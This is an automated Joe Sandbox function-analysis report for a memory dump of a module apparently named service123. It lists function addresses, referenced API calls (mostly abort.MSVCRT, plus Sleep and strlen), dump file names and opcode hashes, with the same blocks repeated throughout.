abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: 01bc13bf48f1a95f21a77b7997a052e2bd67ce16c6e888905f5e798dc07b86d8
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: 84D0A73179D21F8BCB045F2C8099CBDF3F56B46308B5A5C94C485F3E05D621EA4A8F06

Function 6C2FBE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 25ab2e63c7aa21128eb367b2ea670fa7046e932721f0ef363c2f6becacb7e660
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: 7AD0173028970D8F8300EF48D1988A9F7F5AB4A305B019D69C84897B24D632D848CE02

Function 6C2FBDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: c077031bf681d6c90e95843038d4055c265c865c740016cdc803e813b1483e44
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 73C01222AD931D8BC1102D9C505177AF2A49B07304F522C188D9533E008B52EC498A47

Function 6C2FBE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 0768c6e81f1531dbe76f74f535c1f5d18e1f1d8baf19655f07652b4392dc30fa
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: AFC0123679931D8B8200AE8890918A9F274AB5B304F412C54CD5173B008761E849CA43

Function 6C2FBDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D03
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D08
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction ID: 7ddc4a0ba7648a24b59597d14f2e56282344bdfa0229a84c5b3d0e0a0d673fc1
Opcode Fuzzy Hash: 69f2f5bcc04e92503fe01ced6f102d5792e48c4d85d4df18c058018d50acc486
Instruction Fuzzy Hash: 5EC08C32BDC31D8740003D4C1096878F2A40707324F462D14C84033F00CA03D8898A46

Function 6C2FC150 Relevance: 36.3, APIs: 24, Instructions: 284COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b0fe0e6f13069f2a05d7ec0c6ed9c6692f3af21a425fdd9f8feb84d84408913
Instruction ID: 5f137782c958aeb374aaba6c7bd0208a8e60543a97533b154c3e5084911b30f9
Opcode Fuzzy Hash: 7b0fe0e6f13069f2a05d7ec0c6ed9c6692f3af21a425fdd9f8feb84d84408913
Instruction Fuzzy Hash: 9CB1B271A4834A8FD720DF18C48075AFBF1BF86708F04496DE9A59BB02C375E945CB92

Function 6C2FC470 Relevance: 33.2, APIs: 22, Instructions: 152COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D12
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D17
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 823dcffa411acc7a0ba6da02aae05b9d5ffb0405c6cf26622126a40d81ee21cc
Instruction ID: 89948a1d8a8003a7691d409b9a3fb15e4d86e007dff8c6786172cd7897fcfedb
Opcode Fuzzy Hash: 823dcffa411acc7a0ba6da02aae05b9d5ffb0405c6cf26622126a40d81ee21cc
Instruction Fuzzy Hash: C841BDB1A9121D8BCB10CF68C4817A9FBF5BF49714F18846AEC64EF782D33594428B50

Function 6C2FD370 Relevance: 31.6, APIs: 21, Instructions: 130sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 6C2FCD00: strlen.MSVCRT ref: 6C2FCD7D

Sleep.KERNEL32 ref: 6C2FD4D7
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D30
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D35
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D44
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D4C
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D51
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D56
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D5B
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D60
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D65
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6A
abort.MSVCRT(?,?,?,?,?,?,6C2FE2F4,?,?,?,?,?,?,00000000,00000001,6C30008D), ref: 6C3C6D6F
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D74
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D79
abort.MSVCRT(?,?,00000000,00000000,?,74DEE010,6C30038F), ref: 6C3C6D7E

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: b8d4768bf2cea4622d0c6c0d5e73271485cc6b25c1e17bd86632bf92dbd487bd
Instruction ID: 9d8db9a88821dabc437d65a21636b25612bf77ed2113f524d36bffeecfc7d4ec
Opcode Fuzzy Hash: b8d4768bf2cea4622d0c6c0d5e73271485cc6b25c1e17bd86632bf92dbd487bd
Instruction Fuzzy Hash: 3351A5A064C3C5CEEB11EB39C04A765BFF46753308F084598DBDC4BA82D3BA5549CB6A

Function 6C2FD570 Relevance: 28.6, APIs: 19, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2936412308.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000004.00000002.2936396286.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936490519.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936508130.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936544195.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936562203.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.2936578739.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 3405c38f0d83f4af272141fe34c68ddd3ab5b9b18e7966a728bccfea454125c4
Instruction ID: 3ad66ca459459836366690b84773cde4fb37e7e70368fcfdd3457589091b64b9
Opcode Fuzzy Hash: 3405c38f0d83f4af272141fe34c68ddd3ab5b9b18e7966a728bccfea454125c4
Instruction Fuzzy Hash: 0531A47068930E8FE310DF59E480B6EF7E0AF85319F14892DE9A897B41D335E8458F82

Function 6C2FD67C Relevance: 28.5, APIs: 19, Instructions: 32COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D21
abort.MSVCRT(?,?,?,?,00000001,?,6C2FC5DB), ref: 6C3C6D26
